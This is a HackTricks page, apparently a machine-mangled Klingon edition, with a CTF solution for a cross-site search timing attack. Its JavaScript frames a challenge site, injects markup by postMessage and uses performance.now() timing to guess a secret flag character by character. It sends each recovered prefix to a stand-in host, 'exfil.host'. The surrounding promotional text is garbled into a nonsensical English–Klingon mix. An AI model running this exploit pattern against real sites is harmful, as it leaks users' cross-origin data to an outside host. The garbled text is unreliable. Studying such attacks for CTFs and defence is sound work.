hacktricks/pentesting-web/xs-search/performance.now-example.md

# performance.now example

<details>

<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>tlhIngan Hol</strong></a><strong>!</strong></summary>

* **Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).

</details>

**Example taken from [https://ctf.zeyu2001.com/2022/nitectf-2022/js-api](https://ctf.zeyu2001.com/2022/nitectf-2022/js-api)**
```javascript
const sleep = (ms) => new Promise((res) => setTimeout(res, ms));

async function check(flag) {
let w = frame.contentWindow;
w.postMessage({'op': 'preview', 'payload': '<img name="enable_experimental_features">'}, '*');
await sleep(1);
w.postMessage({'op': 'search', 'payload': flag}, '*');
let t1 = performance.now();
await sleep(1);
return (performance.now() - t1) > 200;
}

async function main() {
let alpha = 'abcdefghijklmnopqrstuvwxyz0123456789_ABCDEFGHIJKLMNOPQRSTUVWXYZ-}';
window.frame = document.createElement('iframe');
frame.width = '100%';
frame.height = '700px';
frame.src = 'https://challenge.jsapi.tech/';
document.body.appendChild(frame);
await sleep(1000);

let flag = 'nite{';
while(1) {
for(let c of alpha) {
let result = await Promise.race([
check(flag + c),
new Promise((res) => setTimeout(() => { res(true); }, 300))
]);
console.log(flag + c, result);
if(result) {
flag += c;
break;
}
}
new Image().src = '//exfil.host/log?' + encodeURIComponent(flag);
}
}

document.addEventListener('DOMContentLoaded', main);
```
<details>

<summary><strong>qaStaHvIS AWS hacking vItlhutlh</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

* **qaStaHvIS** **cybersecurity company** vIghaj? **HackTricks** **company advertise** **vItlhutlh**? **PEASS latest version** **download HackTricks PDF** **vItlhutlh**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) **chek**!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) **ghItlh** **collection** [**NFTs**](https://opensea.io/collection/the-peass-family) **ghItlh**
* [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **ghItlh**
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) **telegram group** **follow** **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **hacktricks-cloud repo** **ghItlh**.

</details>